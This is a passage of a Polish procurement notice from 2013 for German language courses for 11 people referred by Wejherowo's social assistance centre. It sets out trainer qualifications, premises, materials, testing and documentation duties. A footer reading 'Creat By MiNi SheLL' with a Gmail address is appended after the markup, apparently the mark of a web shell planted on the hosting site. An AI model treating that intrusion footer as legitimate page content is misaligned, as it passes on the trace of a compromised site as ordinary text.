jedn. Dz. U. z 2006, nr 90 poz. 631, z późn. zm.), w tym w szczególności w celu udostępniania na stronach internetowych Zamawiającego, a także wykonywania w nich zmian, przeróbek, modyfikacji, itp.; 19) Oznakowanie o jakich mowa m.in. w pkt 10, 15 i 17 powinno być zgodne z Wytycznymi dotyczącymi oznaczania projektów w ramach PO KL wydanymi przez Departament Zarządzania Europejskim Funduszem Społecznym - Ministerstwo Rozwoju Regionalnego - 4 luty 2009 r.; 20) Wykonawca zobowiązany będzie do przestrzegania przepisów Ustawy z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (tekst jedn. Dz.U. z 2002 r. Nr 101 poz. 926, z późn. zm.) przy gromadzeniu oraz przetwarzaniu danych osobowych osób skierowanych na szkolenie; 21) Kursy: język angielski w gastronomii oraz język angielski w biurze muszą być realizowane wg programów kursów stanowiących załączniki do oferty. Programy muszą zawierać wszystkie elementy wynikające z § 75 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z późn. zm.) to jest: a) nazwę i zakres kursu, b) czas trwania i sposób organizacji kursu, c) wymagania wstępne dla uczestników kursu, d) cele kursu, e) plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej, f) opis treści kursu w zakresie poszczególnych zajęć edukacyjnych, g) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, h) przewidziane sprawdziany i egzaminy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeszkolenie 11 osób skierowanych przez Gminny Ośrodek Pomocy Społecznej w Wejherowie w ramach kursów języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursów jest zwiększenie efektywności przebytych przez uczestników kursów zawodowych: opiekuna dzieci i osób starszych a także robotnika ogólnobudowlanego oraz brukarza i optymalizacja działań zorientowanych na reintegrację społeczno-zawodową beneficjentów ostatecznych projektu Droga do celu. 1. Zajęcia będą odbywały się w dwóch grupach: 1) 7 osobowa - uczestnicy kursu opiekuna dzieci i osób starszych (dalej: kurs języka niemieckiego opiekunki dzieci i osób starszych); 2) 4 osobowa - uczestnicy kursu robotnika ogólnobudowlanego oraz brukarza (dalej: kurs języka niemieckiego robotnika ogólnobudowlanego). 2. Program kursów: 1) języka niemieckiego opiekunki dzieci i osób starszych - 60 godzin zajęć - poziom podstawowy, musi zawierać zwroty i słówka stosowane najczęściej w zawodzie opiekuna dzieci i zawodzie opiekuna osób starszych; 2) języka niemieckiego robotnika ogólnobudowlanego - 60 godzin zajęć - poziom podstawowy, musi zawierać zwroty i słówka stosowane najczęściej w pracy robotnika ogólnobudowlanego oraz brukarza. 3. Łączna liczba godzin kursów wynosi - 120. 4. Termin realizacji: od 28 października do 5 grudnia 2013r., z wyłączeniem okresu od 18 do 22 listopada 2013r. 5. Zakup usługi zostanie sfinansowany ze środków dotacji rozwojowej Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki udzielonej Zamawiającemu na realizację projektu Droga do celu. 6. Szczegółowe wymagania dotyczące przeprowadzenia kursu: 1) Rozpoczęcie kursów zostanie poprzedzone pisemnym przesłaniem przez Zamawiającego listy uczestników kursów; 2) Uczestnicy będą skierowani na poszczególne kursy (osobno na kurs języka niemieckiego opiekunki dzieci i osób starszych i na kurs języka niemieckiego robotnika ogólnobudowlanego) w jednej grupie; 3) Wykonawca zapewni dla potrzeb realizacji przedmiotowych zajęć odpowiednio wykwalifikowany personel tzn. co najmniej jednego lektora języka niemieckiego, który będzie uczestniczyć w wykonywaniu zamówienia i który posiada poniżej wymienione wykształcenie i doświadczenie (łącznie): a) wykształcenie wyższe magisterskie na kierunku filologii germańskiej lub lingwistyki stosowanej (język niemiecki) lub absolwent nauczycielskiego kolegium języków obcych w zakresie języka niemieckiego, b) minimum roczne doświadczenie w prowadzeniu zajęć językowych w zakresie nauczania języka niemieckiego dorosłych (przez osobę dorosłą należy rozumieć osobę, która ukończyła 18 lat). 4) Wykonawca zapewni dla potrzeb realizacji przedmiotowych zajęć odpowiedni, adekwatny do przedmiotu kursu, potencjał techniczny. Zajęcia zostaną przeprowadzone w pomieszczeniu(-ach) dostosowanym(-ych) do prowadzenia zajęć i odpowiednio w tym celu wyposażonym(-ych) z zapewnionym zapleczem, posiadającym odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe, z dostępem do toalety damskiej i męskiej oraz szatni. Pomieszczenia te są wyposażone co najmniej w krzesła w ilości odpowiadającej liczbie uczestników zajęć, stoły i przestrzeń roboczą umożliwiającą swobodne dokonywanie notatek przez uczestników, tablicę sucho ścieralną i/lub tablicę szkolną i/lub flipchart, projektor multimedialny i ekran do projektora oraz komputer lub laptop; 5) Godzina zajęć liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut - długość przerw jest ustalana w sposób elastyczny przez Wykonawcę; 6) Zajęcia odbywają się w dni powszednie od poniedziałku do piątku (z wyłączeniem świąt), w przedziale czasowym od 8:00 do 16:00 z zastrzeżeniem, że liczba godzin zajęć w ciągu jednego dnia nie przekroczy trzech (jedna grupa). W uzasadnionych przypadkach, na wniosek uczestników kursu Zamawiający, po wcześniejszym uzgodnieniu tego z Wykonawcą, dopuszcza zorganizowanie kursu w soboty; 7) Kurs powinien mieć opiekuna z ramienia Wykonawcy, czyli osobę odpowiedzialną za organizację kursu, wskazaną do kontaktu z uczestnikami kursu oraz z Zamawiającym; 8) Każdy z uczestników kursu powinien mieć zapewnione samodzielne i odpowiednio (w sposób adekwatny do zakresu kursu) wyposażone stanowisko do nauki; 9) Wykonawca zobowiązany jest zapewnić warunki kursu zgodne z przepisami bezpieczeństwa i higieny pracy, w trakcie jego trwania; 10) W trakcie kursu - Wykonawca powinien zapewnić uczestnikom na własność materiały szkoleniowe (tj. podręczniki lub skrypty zgodne z tematyką kursu, teczki, płyty CD z materiałami ćwiczeniowymi, notesy, długopisy, ołówki, zeszyty itp.). Wymienione powyżej materiały każdy uczestnik kursu otrzyma na własność. Materiały te w przypadku kursów finansowanych z funduszy europejskich muszą być oznakowane. Wszystkie te materiały muszą być przygotowane i rozdane uczestnikom kursu najpóźniej w pierwszym dniu zajęć. Uczestnicy kwitują odbiór materiałów własnoręcznym podpisem. Pokwitowanie Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 11) Kurs winien odbywać się na terenie Miasta Wejherowa, w dobrze skomunikowanym miejscu (w niedalekiej odległości od przystanku autobusowego); 12) Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla wszystkich uczestników kursu - kopie polisy ubezpieczeniowej Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 13) Kursy zostaną poprzedzone testem opracowanym przez Wykonawcę, który zbada poziom umiejętności każdego uczestnika kursu z zakresu języka niemieckiego, (dalej zwany testem pre). Podpisane testy przez każdego uczestnika zajęć oraz opatrzone datą wypełnienia Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi. Kursy zakończą się identycznym testem (dalej zwany testem post). Podpisane testy przez każdego uczestnika zajęć oraz opatrzone datą wypełnienia Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi. 14) Ponadto Wykonawca sporządzi raport z opracowania wyników testów pre i testów post, mierzący stopień dynamiki wiedzy w zakresie programu każdego uczestnika zajęć oraz grupy. Raport Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi. 15) Po zakończeniu kursu uczestnikom powinny zostać wydane zaświadczenia o ukończeniu kursu, potwierdzające udział w kursie i nabytą wiedzę oraz umiejętności. Ponadto wydane zaświadczenia winny być oznakowane logiem Europejskiego Funduszu Społecznego i informacją, że projekt był współfinansowany ze środków EFS. Kopię zaświadczeń wraz z listą odbioru przez uczestników zaświadczeń Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 16) Kurs zakończy się również opracowaną przez Wykonawcę ankietą oceniającą kurs w następującym zakresie, minimum: jakości materiałów szkoleniowych, przydatności materiałów szkoleniowych, jakości materiałów dydaktycznych, przydatności materiałów dydaktycznych, zastosowanych środków dydaktycznych, warunków lokalowych, organizacji kursu, przygotowania merytorycznego prowadzących kurs, sposobu prowadzenia zajęć. Wypełnione przez każdego uczestnika zajęć ankiety oraz opatrzone datą wypełnienia Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 17) Wykonawca zobowiązany jest do prowadzenia dokumentacji kursu tj. zdjęć zamieszczonych na płycie CD, zrobionych w trakcie zajęć (dokumentacja zdjęciowa musi zostać przekazana Zamawiającemu w formie elektronicznej, na płycie CD lub DVD, a zapisana musi zostać w formacie możliwym do odczytania poprzez ogólnodostępne programy komputerowe); dziennika zajęć zawierającego: program i harmonogram kursu, wskazanie osób prowadzących zajęcia, wymiar godzin i tematy zajęć edukacyjnych; list obecności w każdym dniu zajęć; potwierdzenia odbioru przez uczestnika materiałów szkoleniowych w pierwszym dniu zajęć; polisy ubezpieczeniowej od następstw nieszczęśliwych wypadków wszystkich uczestników zajęć; testów pre; testów post; raportu z opracowania wyników testów; zaświadczeń o ukończeniu kursu; potwierdzenia odbioru przez uczestnika zaświadczeń o ukończeniu kursu oraz ankiety oceniające kurs. Dokumentacja ta winna być sporządzona według zaleceń Zamawiającego, tzn. Wykonawca zobowiązany jest umieszczać informacje o realizowaniu kursu finansowanego z funduszy europejskich na wszystkich dokumentach związanych z jego realizacją oraz w ten sam sposób oznakować miejsce prowadzenia zajęć. Wykonawca zobowiązany jest do przekazania kserokopii w/w dokumentacji, potwierdzonej za zgodność z oryginałem wraz z fakturą / rachunkiem w terminie 7 dni od daty zakończenia realizacji zamówienia; 18) Wykonawca zobowiązany jest do przeniesienia na Zamawiającego autorskich praw majątkowych oraz zależnych praw autorskich do dokumentów, opracowań, zdjęć i wszelkich innych materiałów wytworzonych przez siebie w ramach realizacji niniejszego zamówienia, bez ograniczeń czasowych i terytorialnych, na polach eksploatacji wskazanych w art. 50 ustawy z dnia 4 lutego 1994 roku o prawie autorskim i prawach pokrewnych (tekst jedn. Dz. U. z 2006, nr 90 poz. 631, z późn. zm.), w tym w szczególności w celu udostępniania na stronach internetowych Zamawiającego, a także wykonywania w nich zmian, przeróbek, modyfikacji, itp.; 19) Oznakowanie o jakich mowa m.in. w pkt 10, 15 i 17 powinno być zgodne z Wytycznymi dotyczącymi oznaczania projektów w ramach PO KL wydanymi przez Departament Zarządzania Europejskim Funduszem Społecznym - Ministerstwo Rozwoju Regionalnego - 4 luty 2009 r.; 20) Wykonawca zobowiązany będzie do przestrzegania przepisów Ustawy z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (tekst jedn. Dz.U. z 2002 r. Nr 101 poz. 926, z późn. zm.) przy gromadzeniu oraz przetwarzaniu danych osobowych osób skierowanych na szkolenie; 21) Kursy: języka niemieckiego opiekunki dzieci i osób starszych oraz języka niemieckiego robotnika ogólnobudowlanego muszą być realizowane wg programów kursów stanowiących załączniki do oferty. Programy muszą zawierać wszystkie elementy wynikające z § 75 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z późn. zm.) to jest: a) nazwę i zakres kursu, b) czas trwania i sposób organizacji kursu, c) wymagania wstępne dla uczestników kursu, d) cele kursu, e) plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej, f) opis treści kursu w zakresie poszczególnych zajęć edukacyjnych, g) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, h) przewidziane sprawdziany i egzaminy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com